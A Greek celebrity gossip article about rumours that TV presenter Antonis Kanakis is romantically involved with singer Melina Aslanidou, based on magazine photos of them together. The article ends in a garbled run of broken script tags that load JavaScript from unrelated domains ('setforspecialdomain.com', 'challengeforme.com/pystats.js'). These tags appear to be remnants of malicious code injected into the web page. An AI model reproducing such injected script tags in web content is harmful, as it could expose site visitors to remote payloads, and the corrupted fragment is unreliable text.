Το πάθαμε το εγκεφαλικό: Δείτε με ποια τραγουδίστρια είναι ζευγάρι ο Κανάκης!

Μετά τη Ρένια το χάος. Πληθώρα σχολίων πυροδότησε πρόσφατη συνάντησε του Αντώνη Κανάκη και της Μελίνας Ασλανίδου που πολλοί τους θέλουν να εξελίσσονται σε ένα από τα πιο hot ζευγάρια της ελληνικής σόουμπιζ.

Ο φωτογραφικός φακός του περιοδικού YES τους συνέλαβε σε τετ-α-τετ, στο μαγαζί που διατηρεί ο παρουσιαστής στη Χαλκιδική, το οποίο δεν πέρασε απαρατήρητο. Με αφορμή αυτή τη συνάντηση, πολλοί ήταν αυτοί που μίλησαν για μία ερωτική διάθεση και των δύο και τότε φυσικά δεν άργησαν να μιλήσουν για μία νέα σχέση. Απ” ό,τι φαίνεται ο παρουσιαστής -φρεσκοχωρισμένος από την Κλέλια Ρένεση- δε μπορούσε να κρύψει το θαυμασμό του για την τραγουδίστρια και απολάμβανε την παρέα της.

Τίποτε ακόμα δεν είναι επίσημο, όμως οι φήμες που μιλούν για ένα νέο έρωτα, ολοένα και πληθαίνουν. Μένει μόνο να επαληθευθούν.

 ___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >